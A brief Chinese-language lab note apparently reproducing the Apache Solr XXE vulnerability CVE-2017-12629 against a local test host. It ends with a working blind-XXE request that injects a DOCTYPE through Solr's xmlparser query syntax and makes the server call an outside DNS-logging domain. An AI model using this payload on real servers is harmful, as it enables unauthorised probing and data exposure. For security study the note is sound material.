Apache solr xml实体注入漏洞(CVE-2017-12629)
http://192.168.64.145:8983/solr/#/
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。
http://192.168.64.145:8983/solr/demo/select?q=video&wt=xml
这是一个盲注XXE
采用dnslog平台来证明存在
http://192.168.64.145:8983/solr/demo/select?q={!xmlparser v=’<!DOCTYPE a SYSTEM “http://xxe.9qe5rc.ceye.io"></ a>’}&wt=xml